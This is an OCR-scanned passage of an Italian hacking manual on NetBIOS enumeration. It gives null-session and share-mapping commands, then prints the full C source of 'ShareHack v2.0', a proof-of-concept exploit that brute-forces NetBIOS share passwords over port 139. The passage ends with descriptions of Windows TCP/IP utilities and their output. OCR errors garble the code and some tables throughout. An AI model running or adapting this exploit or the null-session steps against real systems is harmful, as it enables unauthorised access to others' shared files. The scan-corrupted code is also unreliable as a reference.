operativo, dei servers attivi su questo, l'identificazione del dominio e della sua composizione 
a livello di hosts e altre informazioni che successivamente vengono prese in esame 
singolarmente mediante le metodologie specifiche di un livello. 

Durante la fase di scanning abbiamo visto le porte aperte sul sistema tra le quali avrebbero 
potuto essercene alcune come la 139 

Questa porta come alcune altre fanno parte di quello che viene definito con il termine di 
NETBIOS (Network Basic Input/Output System) ovvero uno strato software sviluppato per 
creare un link tra sistemi operativi di rete basati su hardware specifici. 
Questo protocollo è al giorno d'oggi molto utilizzato in quanto supportato da Ethernet, Token 
Ring e reti IBM. 



NetBIOS Interface 




TDI Interface 



Driver 



NIC 



Se quanto detto è vero allora questa fase diventa uno degli steps fondamentali nell'ambito 
dell'individuazione dei metodi finalizzati alla ricerca del modo di accesso sul sistema remoto. 
La differenza tra la fase precedente e questa è anche legata al livello di intrusione delle due 
tecniche. 

La prima in grossa parte viene svolta mediante sistemi d'interrogazione che ricevono dati 
statici mentre questo livello pretende una connessione attiva la quale potrebbe essere (quasi 
sicuramente) logata. 

Questo livello di analisi è indirizzato all'ottenimento delle seguenti informazioni: 



Risorse di rete e condivisioni 
Informazioni sugli utenti e sui gruppi 
Applicazioni 



Negli appositi capitoli abbiamo visto il protocollo NetBios vedendo di questo solo le 
caratteristiche professionali, se così le possiamo definire, ignorando i metodi per individuare 
se su un determinato sistema ci sono risorse condivise a livello di questo protocollo. 
Dentro ai sistemi operativi esiste il comando NET il quale permette di ricavare le informazioni 
di questo tipo ovvero quali risorse un sistema mette in condivisione. 

La procedura per la visualizzazione e per tentare di accedere a quelle esistenti è possibile da 
realizzare tramite le utilties fornite a livello di OS anche se di fatto nell'universo delle Utilities 
presenti sulla rete troviamo un numero incredibile di software adatti a questi scopi. 
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Tramite la porta TCP 139 è possibile accedere a quella che viene definita con il termine di 
NULLSESSION. 

Nell'apposito capitolo abbiamo visto il registro di Windows. 
All'interno di questo esiste una voce dentro alla chiave : 



chiamata 

RestrictAnonymous 



Definita come REG_DWORD la quale può esere come valore 0, 1 oppure 2 in WIN2000. 
Se non è stata disabilitata tramite l'apposito settaggio, il comando : 

net use \\192 . 168 . 225 . 1\IPC$ /u:"" 

connette l'interprocesso nascosto di comunicazione "share" all'indirizzo IP specificato 
attribuendolo all'utente anonimo ( /u:"" ) assegnandogli una password NULL. 
Se il comando ha avuto successo viene creato un canale aperto utilizzabile successivamente 
con un certo numero di altre tecniche. 

Il comando net può essere utilizzato per enumerare i domini sulla rete : 

c: \>net view /websitek 

Domain 

WEB SI TEKHOS T_ COMP UTER 
WEBSITEKINFO DOMAIN 



The command compieteci success fully 

Per listare un determinato computer dentro a un dominio è sempre possibile utilizzare 
comando net con la seguente sintassi. 



C:\>net view /websitek. 


■ websitekhost_computer 


Server Name 


Remark 


\ \CMP1 


Computer 1 


\ \CMP2 


Computer 2 


\ \COMPUTER 


Computer 3 



La visualizzazione delle risorse condivise su un determinato IP può avvenire tramite 
comando : 

C:\>net view 123.123.123.123 
C:\>net view \\studentl 

Shared resources at 123.123.123.123 

Share name Type Used as Comment 

NETLOGON Disk Logon server share 

Test Disk 



Ricordiamoci che le condivisioni C$ ADMIN$ e IPC$ sono nascoste per cui non visualizzate. 
La mappatura di una risorsa remota con una locale potrebbe avvenire con : 



C:\net use x: \\123 . 123 . 123 . 123\test 
The command completed success fully. 
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Adesso il prompt di comando o l'explorer potrebbe essere utilizzato per accedere al drive X: 



C: \net use 












New connections will 


be remembered . 










Status Locai 


Remote 




Network 






OK X: 


W123.123.123. 


123\test 


Microsoft 


Windows 


Network 


OK 


W123.123.123. 


123\test 


Microsoft 


Windows 


Network 


The command compieteci success fully . 











Esiste una serie di comandi NET che possono essere usati per diversi scopi : 



net localgroup <enter> mostra quali gruppi sono stati creati sulla macchina locale. 

net name <enter> vi mostra il nome del computer e quelli che sono loggati. 

net accounts <enter> vi mostra le restrizioni delle password per l'utente 

net share <enter> visualizza le condivisoni sulla macchina locale comprese quelle con $ 

net user <enter> vi mostra gli account creati sulla macchina locale 

net start service. Fa partire un servizio 

Il dump della tabella NETBIOS può essere eseguita tramite un altro comando presente in 
quasi tutti I sistemi operativi e precisamente : 

c:\>nbtstat -A 192.168.255.1 



NetBios Remote Machine Name Table 



Name 


Type Status 


SERVER1 


<00> UNIQUE Registered 


SERVER9 


<20> UNIQUE Registered 


9DOMAIN 


<00> GROUP Registered 


9DOMAIN 


<1E> GROUP Registered 


SERVER9 


<03> UNIQUE Registered 


. . MSBROWSE . 


<01> GROUP Registered 


ADMINISTRATOR 


<03> UNIQUE Registered 


MAC Address =00 


-A0-CC-57-8C-8A 


1 significati dei codici sono 1 seguenti : 


NetBios Code 


Resource 


<computer name> [00] 


Workstation service 


<domain name>[00] 


Domain name 


<computer name> [03] 


Messenger service (messaggi inviati a questo computer) 


<user name>[00] 


Messanger service (per I messaggi spediti a questo utente) 


<computer name> [20] 


Server service 


<domain name> [ 1D ] 


Master browser 


<domain name> [ 1E ] 


Browser Service Eections 


<domain name> [ 1B ] 


Domain Master Browser 



Una delle migliori Utilities per l'enumerazione è DUMPSEC la quale è disponibile dalla 
Somarsoft ( http://www.somarsoft.com) . 



N etBios S hare H ack 

// proof of concept for the netbios share password exploit first discovered by nsfocus 
// http : / /www . nsfocus . com/english/homepage/ sa_05 . htm 

^include <winsock2.h> 
^include <windows.h> 
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^include <std±o.h> 
// prototypes 

int nbmakehspacket (char *packet,char * sitarne , char *tname) ; 

int checkpw (char *target,char * compilarne, char * sharename , int delay) ; 

void mangler (char *in,char cut [32] ) ; 

void writepacket (char *packet,char *input,int pos) ; 



void writepacket (char *packet,char *input,int pos) { 
unsigned int i,p=pos; 

for (i=0 ; i<strlen (input) ; i++,p++) { 
packet [p ] =input [i ] ; 

} 



void mangler (char *in,char *out) { 
unsigned int i,z=0; 

for (i=0; i<strlen (in) ;i++) { 

out [z++] =0x41+ (toupper (in [i] ) »4) ; 
out [z++ ] =0x41+ (toupper (in [i])& OxOF) ; 

} 

while(z<32) { 

out [z++]='C< ; 
out [z++]='A' ; 

} 

} 

int nbmakehspacket (char *packet,char *sname,char *tname) { 
unsigned int i; 
int pos=5; 

for (i=0 ; i<strlen (sname) ; i++,pos++) { 
packet [pos ] =sname [i ] ; 

} 

packet [pos] =0x00; 
packet [ ++pos ] =0x20; 
pos++; 

for (i=0 ; i<strlen (tname) ; i++,pos++) { 
packet [pos ] =tname [i ] ; 

} 

packet [ ++pos ] =0x00; 



return pos; 



} 



int checkpw(char *target,char *compname, char * sharename , int delay) ( 
WSADATA wsaData; 
SOCKET s; 

struct sockaddr_in A; 
struct hostent *H; 
char packet [200] ; 
char mangled[33] ; 
int packetsize=100 ; 
int i; 

char password [10] ; 
char ppos=0; 

if (WSAStartup (MAKEWORD (2, 2) , SwsaData) !=0) ( 

printf ( "Error : wsastartup failed\n") ; 
return 0; 

} 

if ( ! (H=gethostbyname (target) ) ) { 

printf ( "Error : cannot resolve host\n") ; exit(l); 

} 

if (INVALID__SOCKET== (s=socket (AF_INET, SOCKSTREAM, IPPROTO^TCP ) )) ( 
printf ("Error: cannot create tcp socket\n") ; 
return 0; 

} 

A. sin__family=AF_INET; 
A. sin_port=htons (139) ; 
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if (0 ! =connect (s, (struct sockaddr *) SA, sizeof (A) ) ) { 

printf ("Error: cannot connect to target host\n") ; 
closesocket (s) ; 
return 0; 

} 

printf '("-> connected\n") ; 

/ / assemble S send handshake packet 
memset (packet, 0, 200) ; 
packet [0] =0x81 ; 
packet [1] =0x00; 
packet [2] =0x00; 
packet [3] =0x44; 
packet [4] =0x20; 

memset (mangled, 0, 33) ; 
mangler (compname , mangled) ; 
packetsize=nbmakehspacket (packet , mangled, mangled) ; 
send (s, packet, packetsize, 0) ; 

// recieve handshake response 
memset (packet, 0, 200) ; 

packetsize=recv(s, packet, 200, 0) ; 

if (packet [0]==(char) 0x82 SS !packet[l] SS ìpacket [2] ) 
printf ("-> netbios negotiation successful\n") ; 

else { 

printf ("Error : netbios negotiation not success ful\n") ; 
closesocket (s) ; 
return 0; 

} 



// type = handshake 
// flags = none 
// length 1 
// length 2 
// whitespace 



// assemble start packet 
memset (packet, 0, 200) ; 
packet [0] =0x00; 
packet [1] =0x00; 
packet [2] =0x00; 
packet [3] =0xa4; 



// type = 0 
// flags = 0 
// length 1 
// length 2 



packet [4] =Oxff; 
packet [ 6]=0x4d; 
packet [8] =0x72; 
packet [31] =0x1 8; 
packet [35] =0x1 9; 
packet [39] =0x02; 



packet [5] =0x53; 

packet [7] =0x42; 

packet [30] =Oxed; 
packet [34] =0x51 ; 
packet [37] =0x81; 



writepacket (packet , "PC NETWORK PROGRAM 1.0\0" ,40) ; 
packet [62] =0x00; 
packet [63] =0x02; 

writepacket (packet, "MICROSOFT NETWORKS 1 . 03\0", 64) ; 
packet [87] =0x00; 
packet [88] =0x02; 

writepacket (packet, "MICROSOFT NETWORKS 3.0\0",89); 
packet [111 ]=0x00; 
packet [112] =0x02; 

writepacket (packet, "LANMAN1 . 0\0", 113) ; 
packet [ 122] =0x00; 
packet [123] =0x02; 

writepacket (packet, "LM1 . 2X0 02\ 0 ", 124) ; 
packet [133] =0x00; 
packet [134] =0x02; 

writepacket (packet, "Samba\0", 135) ; 
packet [140] =0x00; 
packet [141] =0x02; 

writepacket (packet , "NT LM 0 . 12\0" , 142) ; 
packet [152] =0x00; 
packet [153] =0x02; 

writepacket (packet, "NT LANMAN 1.0\0" ,154) ; 
packet [167] =0x00; 

send (s, packet, 168, 0) ; 

// recieve startpacket response 
memset (packet, 0, 200) ; 

packetsize=recv(s, packet, 200, 0) ; 
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// hack password 
memset (password, 0, 10) ; 
printf ("-> Password is : "); 
for (1=32; i<l 75; i++) { 

password [ppos ] =1; 

// assemble passwd-check packet 
memset (packet, 0, 200) ; 

packet [0] =0x00; // type = 0 

packet [1] =0x00; // flags = 0 

packet [2] =0x00; // length 1 

packet [3] =0x32+ (ppos+1) +strlen (compname) +strlen (sharename) ; // 

length 2 

packet [4] =Oxff; 
packet [5] =0x53; 
packet [ 6]=0x4d; 
packet [7] =0x42; 
packet [8] =0x75; 
packet [13] =0x18; 
packet [14] =0x01 ; 
packet [15] =0x20; 
packet [31] =0x28; 

packet[36]=0x04; 

packet [3 7] =Oxff; 
packet [43] =ppos+l ; 
packet [45] =0x10; 
packet [46] =0x57; 

writepacket (packet , password, 47) ; 

writepacket (packet, "\\\ \ ", 47+strlen (password) ) ; 

writepacket (packet, compname, 49+strlen (password) ) ; 

writepacket (packet, "\ \ ", 49+strlen (password) +strlen (compname) ) ; 

writepacket (packet, sharename, 50+strlen (password) +strlen (compname) ) ; 

packet [50+strlen (password) +strlen (compname) +strlen (sharename) ]=0x00; 

packet [51+strlen (password) +strlen (compname) +strlen (sharename) ]=0x41; 

packet [52+strlen (password) +strlen (compname) +strlen (sharename) ]=0x3a; 

packet [53+strlen (password) +strlen (compname) +strlen (sharename) ]=0x00; 



send ( s , packet , 54+strlen (password) +strlen (compname) +strlen (sharename) , 0) ; 

// recieve passwd-check response 
memset (packet, 0, 200) ; 

packetsize=recv (s, packet , 200, 0) ; 
printf ( " %c ", password [ppos ] ) ; 

if (packet [9]== (char) 0x00 && packet [11] == (char) 0x00) { 

ppos++; 
i=32; 

} else printf ("\b") ; 
if(ppos>7) break; 
Sleep (delay) ; 

} 

printf (" "); 
printf ("\n") ; 

closesocket (s) ; 
WSACleanup () ; 

return 1; 

} 

////////////////////////////////////////////////////////////////////////////////////// 

char *sup(char *in) { 
int i; 

for (i=0; i<strlen (in) ; i++) 

in[i] =toupper (in[i] ) ; 
return in; 

) 

////////////////////////////////////////////////////////////////////////////////////// 

int main (char *argc,char **argv) { 
int delay=100; 

printf ("ShareHack v2 . 0 by Bjoern Stickler\n" ) ; 
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pr±ntf(" \n\n"); 

if (argc<4) { 

printfC'Syntax: sh2.exe targetip computername sharename [ms delay]\n") ; 
printf(" f.ex.: sharehack2.exe 192.168.0.1 webgate temp\n") ; 

printf(" if you have \\\\webgate\\temp share with 

computer ip 192 . 168 . 0 . l\n" ) ; 

return 0; 

} 

if(argv[4] ) sscanf (argv [4] , "%d" , Sdelay) ; 
checkpw (argv [ 1 ] , sup (argv [2] ) , sup (argv [3]) , delay) ; 



Utilities TCP 

Esiste un certo numero di Utilities indirizzate alla gestione e alla manutenzione di TCP/IP le 
quali sono presenti su quasi tutti i tipi di sistemi operativi. 

In molti casi il loro scopo è quello indirizzato alla risoluzione di problemi legati ai protocolli, ma 
in ogni caso il loro uso può anche essere eseguito per ottenere determinate informazioni 
legate al sistema a cui queste si riferiscono tramite l'uso di particolari argomenti. 
I pacchetti sono : 



arp 


Visualizza la cache ARP (Address Resolution Protocol) 


hostname 


Mostra il nome host del computer 


ipconfig Visualizza la configurazione di rete TCP/IP 


nbtstat 


Controlla lo stato delle connessioni NetBios 


netstat 


Visualizza le statistiche delle connessioni TCP/IP corenti 


netdiag 


Verifica tutti gli aspetti della connessione di rete 


nslookup 


Controlla i records, gli alias e i dati generali di un dominio 


pathping 


Rileva un percorso ad un sistema remoto 


ping 


Invia richieste ICMP Echo 


route 


Visualizza le tabelle di instradamento 


tracert 


Rileva un percorso a un sistema remoto 



Arp 

Arp permette di visualizzare e modificare la cache ARP. 

Se due sistemi host sulla stessa subnet no riescono a portare a termine un ping tra di loro, 
eseguire il comando arp -a sui due computer per verificare che questi dispongano di indirizzi 
MAC. 

E' possibile provare ipconfig per determinare l'indirizzo MAC dell'host corretto. 



C: \> arp -a 




Interfaccia: 188.16.3.123 su 


interfaccia 0x2 


Indirizzo internet 


Indirizzo fisicoDigitare 


188.16.3.1 


00-e0-34-c0-al-40 dinamico 


188.16.4.231 


00-00- f8-05-ab-99 dinamico 


188.16.4.54 


00-ab-09-12-cb-af dinamico 



Il comando arp -d indirizzo IP> permette di eliminare le voci non corrette mentre arp -d 
indirizzo MAC> (espresso come numeri esadecimali) aggiunge nuove voci statiche. 
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La lista delle opzioni è la seguente : 



Opzione 



Nome 



Effetto 



—d <indirizzo IP> 
—s <indirizzo MAO 

-N indirizzo IP inter.> 

-a 



Eliminazione Rimuove la voce specificata 
Statico Aggiunge una voce statica 

Interfaccia Elenca tutte le voci ARP dell'interfaccia 

Schermo Visualizza le voci ARP 



Hostname 

Hostmane visualizza il nome dell'host sul sistema su cui viene lanciato. 
I pconf ig 

Ipconfig è uno strumento della riga di comando che visualizza la configurazione corrente dello 
stack IP installato su un computer collegato alla rete. 

Quando viene utilizzato con l'opzione /ali, mostra un rapporto dettagliato sulla configurazione 
per tutte le interfacce, compresi i miniport WAN configurati, generalmente impiegati per 
l'accesso remoto o le connessioni VPN. 

Come tutti i comandi digitati a shell l'output può essere reindirizzato verso un file. 



C:>\ipconfig /ali 

Configurazione IP di Windows 2000 

Nome host 

Suffisso DNS primario . . . 

Tipo nodo 

IP Routing abilitato . . . . 
WINS Proxy abilitato . . . . 
Elenco ricerca suffisso DNS 



: TESTPC1 

: reskit . com 

: Ibrido 

: No 

: No 

: nsl . websitek . com 
ns2 . websitek . com 



Scheda Ethernet Connessione alla rete locale: 



Suffisso DNS specifico di connessione 

Descrizione 

Indirizzo fisico 

DHCP abilitato 

Indirizzo IP 

Subnet Mask 

Gateway predefinito 

Server DHCP 

Server DNS 

Server WINS primario 

Server WINS secondario 

Lease indirizzo 



ns . websitek . com 

3-com XL 780 10/1 OOmb Ethernet 

00-cb-89-ef-09-aa 

Si 

192.168.255.1 

255.255.255.0 

192.168.255.150 

192.168.255.148 

192.168.255.9 

192.168.255.2 
192.168.255.9 

05.05.99 8:31:15 AM 



Altri parametri utili per IPCONFIG sono /flushdns, che elimina la cache nomi DNS, 
/registerdns, che aggiorna tutti i lease DHCP e /displaydns, che mostra il contenuto della 
cache del revolver DNS. 

Le opzioni /release <scheda> e /renew <scheda> rilasciano e rinnovano l'indirizzo IP allocato 
dal protocollo DHCP per una determinata scheda. 



Opzione 



Effetto 



/ali Restituisce un rapporto dettagliato sulla configurazione per le interfacce 

/flushdns Rimuove tutte le voci dalla cache DNS 

/registerdns Aggiorna tutti i lease DHCP e registra di nuovo i nomi DNS 

/displaydns Mostra il contenuto della cache 

/release Rilascia 1' indirizzo IP per una determinata interfaccia 

/renew Rinnova 1' indirizzo IP per un interfaccia 



/showclassid Mostra tutti gli ID di classe DHCP 
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Il comando produce un output del tipo: 

Z: \sito>ipconfig /ali 

Windows 2000 IP Configuration 

Host Name ; WEBSITEK-HOST-1 

Primary DNS Sufflx ; websitek.it 

Node Type ; Broadcast 

IP Routing Enabled : No 

WINS Proxy Enabled ; No 

DNS Suffix Search List ; weJbsiteJc.it 

Ethernet adapter 192.168.255.17: 

Connection-speci fic DNS Suffix . 

Description ; Intel (R) PRO/100+ Alert 

on LAN* Mana 

gement Adapter 

Physical Address ; 00-D0-B7-C8-7F-0C 

DHCP Enabled ; No 

IP Address ; 192.168.255.17 

Subnet Mask ; 255 .255 .255 .0 

Default Gateway ; 192.168.255.150 

DNS Servers : 212 . 210 . 165 . 131 

212.210.165.130 

Ethernet adapter 212 .210 .165 .131: 

Connection-speci fic DNS Suffix . : websitek.it 

Description ; Compaq NC3120 Fast 

Ethernet NIC 

Physical Address ; 00-50-8B-60-EE-2E 

DHCP Enabled ; No 

IP Address ; 212.210.165.131 

Subnet Mask ; 255.255.255.128 

De fault Gateway ; 212 .210 .165 .129 

DNS Servers : 212.210.165.131 

212.210.165.130 

Ethernet adapter Cluster: 

Connection-speci fic DNS Suffix . 

Description ; Compaq NC3120 Fast 

Ethernet NIC #2 

Physical Address ; 00-50-8B-6C-C4-D2 

DHCP Enabled ; No 

IP Address : 10.10.10.1 

Subnet Mask ; 255 .255 .255 .0 

Default Gateway ; 

DNS Servers : 127.0.0.1 



nbtstat 

nbtstat è stato progettato per risolvere i problemi relativi alla risoluzione dei nomi NetBios. 
Quando una rete funziona normalmente , NetBiso su TCP/IP risolve i nomi NetBisoi in 
indirizzi IP servendosi di diverse opzioni di risoluzione dei nomi NetBios tra cui ricerca nella 
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cache locale, query del server WINS, broadcast, ricerca nel file LMHOSTS e query del server 
DNS. 

Il comando nbtstat rimuove e corregge le voci prevaricate utilizzando alcune opzioni che 
fanno distinzione tra maiuscole e minuscole. 

NBTSTAT [ [-a RemoteName] [-A IP address] [-ci [-n] 
[-r] [-R] [-RR] [s] [-S] [interval] ] 



-a (adapter status) 

-A (Adapter status) 

-c (cache) 
addresses 

-n (names) 

-r (resolved) 

-R (Reload) 

-S (Sessions) 

-s (sessions) 



-RR 



(ReleaseRefresh) 



Lists the remote machine ' s name table given its name 
Lists the remote machine 's name table given its 
IP address. 

Lists NBT's cache of remote [machine] names and their IP 
Lists locai NetBIOS names. 

Lists names resolved by broadcast and via WINS 
Purges and reloads the remote cache name table 
Lists sessions table with the destination IP addresses 
Lists sessions table converting destination IP 
addresses to computer NETBIOS names. 

Sends Name Release packets to WINS and then, starts Refr 



esh 



RemoteName Remote host machine name. 

IP address Dotted decimai representation of the IP address . 
interval Redisplays selected statistics, pausing interval seconds 

between each display. Press Ctrl+C to stop redisplaying 
statistics . 



Il risultato e' simile a questo: 
C: \WINNT>nbtstat -s 
192.168.255.17: 

Node IpAddress: [192.168.255.17] Scope Id: [] 



Locai Name 
Input Output 



NetBIOS Connection Table 

State In/Out Remote Host 



WEBSITEK-HOST-1<00> Connected Out PROJECT <20> 

237KB 

6MB 

Cluster: 

Node IpAddress: [10.10.10.1] Scope Id: [] 

No Connections 
212.210.165.131: 

Node IpAddress: [212 .210 .165 .131] Scope Id: [] 



No Connections 




Oppure : 

E: \>nbtstat -A 212 .210 .165 .131 
192.168.255.17: 

Node IpAddress: [192.168.255.17] Scope Id: [] 
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NetBIOS Remote Machine Name Table 
Name T yp& Status 



INet~Services <1C> GROUP Reglstered 
IS~BSITEK-H0ST-<31> UNIQUE Registered 

MAC Address = 00-50-8B-60-EE-2E 



Cluster: 

Node IpAddress: [10.10.10.1] Scope Id: [] 

NetBIOS Remote Machine Name Table 

Name Type Status 



INet~Services <1C> GROUP Registered 
IS~BSITEK-H0ST-<31> UNIQUE Registered 

MAC Address = 00-50-8B-60-EE-2E 



212.210 .165.131: 

Node IpAddress: [212.210.165.131] Scope Id: [] 
NetBIOS Remote Machine Name Table 
Name T yp& Status 



INet~Services <1C> GROUP Registered 
IS~BSITEK-H0ST-<31> UNIQUE Registered 




N etdiag 

Netdiag è un utilità che permette di isolare i problemi relativi alla rete e alla connettività 
mediante l'esecuzione di una serie di verifiche per determinare lo stato e la funzionalità del 
client di rete. 

Questi test e le informazioni fondamentali sulla stato della rete risultanti forniscono agli 
amministratori di rete uno strumento diretto per la rilevazione dei problemi di rete. 

La sintassi prodotta dall'help del comando è : 

Usage: netdiag [/Options] > 

/q - Quiet output (errors only) 
/v - Verbose output 
/l - Log output to NetDiag. log 
/debug - Even more verbose. 

/d : <DomainName> - Find a DC in the specified domain, 
/fix - fix trivial problems . 

/DcAccountEnum - Enumerate DC machine account s . 

/test:<test name> - tests only this test. Non - skippable tests 
will stili b 
e run 

Valid tests are :- 

Ndis - Netcard queries Test 
IpConfig - IP config Test 
Member - Domain membership Test 
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NetBTTransports - NetBT transports Test 
Autonet - Autonet address Test 
IpLoopBk - IP loopback ping Test 
DefGw - Default gateway Test 
NbtNm - NetBT name Test 
WINS - WINS service Test 
Winsock - Winsock Test 
DNS - DNS Test 

Browser - Redir and Browser Test 
DsGetDc - DC discovery Test 
DcList - DC list Test 
Trust - Trust relationship Test 
Kerberos - Kerberos Test 
Ldap - LDAP Test 
Route - Routing table Test 
Netstat - Netstat Information Test 
Bindings - Bindings Test 
WAN - WAN configuration Test 
Modem - Modem diagnostics Test 
Netware - Netware Test 
IPX - IPX Test 
IPSec - IP Security Test 
/ skip : <TestName> - skip the named test. Valid tests are: 
IpConfig - IP config Test 
Autonet - Autonet address Test 
IpLoopBk - IP loopback ping Test 
DefGw - Default gateway Test 
NbtNm - NetBT name Test 
WINS - WINS service Test 
Winsock - Winsock Test 
DNS - DNS Test 

Browser - Redir and Browser Test 

DsGetDc - DC discovery Test 

DcList - DC list Test 

Trust - Trust relationship Test 

Kerberos - Kerberos Test 

Ldap - LDAP Test 

Route - Routing table Test 

Netstat - Netstat Information Test 

Bindings - Bindings Test 

WAN - WAN configuration Test 

Modem - Modem diagnostics Test 

Netware - Netware Test 

IPX - IPX Test 

IPSec - IP Security Test 



Netstat 

Netstat fornisce statistiche relative alle connessioni. 
Lanciato senza opzioni l'output e simile a questo : 



E: \>netstat 












Active 


Connections 












Proto 


Locai Address 






Foreign Address 


State 




TCP 


WEBSITEK-HOST- 


■1 


:ldap 


WEBSITEK-HOST-1 . 


websitek . it : 1136 


ESTABLISHED 


TCP 


WEBSITEK-HOST- 


-1 


:ldap 


WEBSITEK-HOST-1 . 


websitek . it : 1137 


ESTABLISHED 


TCP 


WEBSITEK-HOST- 


■1 


:ldap 


WEBSITEK-HOST-1 . 


websitek . it :1139 


ESTABLISHED 


TCP 


WEBSITEK—HOST- 


■1 


:ldap 


WEBSITEK-HOST-1 . 


websitek . it: 3635 


ESTABLISHED 


TCP 


WEBSITEK—HOST- 


■1 


:m±crosoft-ds WEBSITEK- 


-HOST-l.websitek.it: 4 723 ESTABLI 


SHED 
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TCP 


WEBSITEK- 


-HOST- 


-1 


■1137 


WEBSITEK-HOST-1 


. websitek 


it 


ldap 


ESTABLISHED 


TCP 


WEBSITEK- 


-HOST- 


■1 


■1139 


WEBSITEK-HOST-1 


. websitek 


it 


ldap 


ESTABLISHED 


TCP 


WEBSITEK- 


-HOST- 


■1 


■3633 


WEBSITEK-HOST-1 


. websitek 


it 


ldap 


CLOSE__WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■3635 


WEBSITEK-HOST-1 


. websitek 


it 


ldap 


ESTABLISHED 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4723 


WEBSITEK-HOST-1 


. websitek 


it 


microsoft-ds ESTABL 


ISHED 




















TCP 


WEBSITEK- 


-HOST- 


-1 


■4745 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4746 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4747 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4748 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4750 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4751 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME__WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4752 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


-1 


■4755 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4757 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4758 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4759 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME^WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4760 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4761 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME^WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4762 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME WAIT 


TCP 


WEBSITEK- 


-HOST- 


-1 


■4763 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4764 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4765 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4766 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


-1 


■4767 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


-1 


■4768 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME__WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4769 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4770 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME__WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4771 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME^WAIT 


TCP 


WEBSITEK- 


-HOST- 


-1 


■4772 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■4773 


WEBSITEK-HOST-1 


. websitek 


it 


2301 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


-1 


■4774 


WEBSITEK-HOST-1 


. websitek 


it 


49400 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


cache-mtc-aa05.proxy.aol 


com: 28591 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


cache-mtc-ak07.proxy.aol 


com: 40351 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


cache-mtc-ak09.proxy.aol 


com: 15358 TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


cache-mtc-al04.proxy.aol 


com: 40205 TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


cache— mtc-am06 . proxy . aol 


com: 33311 


TIME_WAIT 


TCP 


WEBSITEK- 


-HOST- 


-1 


■http 


proxyl . infovia . 


com. gt : 27408 


ESTABLISHED 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


proxyl . infovia . 


com. gt: 27417 


ESTABLISHED 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


proxyl . infovia . 


com. gt : 27418 


ESTABLISHED 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


proxyl . infovia . 


com. gt -.27419 


ESTABLISHED 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


AC8F42 6A . ipt .aol. com -.1288 FIN_WAIT_2 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


spiderll . tiscalinet . it -.2399 


TIME_ 


WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


spiderll . tiscalinet . it :2438 


TIME_ 


WAIT 


TCP 


WEBSITEK- 


-HOST- 


-1 


■http 


spiderll . tiscalinet . it :2511 


TIME_ 


WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


spiderll . tiscalinet . it :2520 


TIME_ 


WAIT 


TCP 


WEBSITEK- 


-HOST- 


-1 


■http 


spiderll . tiscalinet . it -.2601 


TIME_ 


WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


spiderll . tiscalinet . it : 2621 


TIME_ 


WAIT 


TCP 


WEBSITEK- 


-HOST- 


-1 


■http 


spiderll . tiscalinet . it :2687 


TIME_ 


WAIT 


TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


spiderll . tiscalinet . it :2713 


TIME_ 


WAIT 


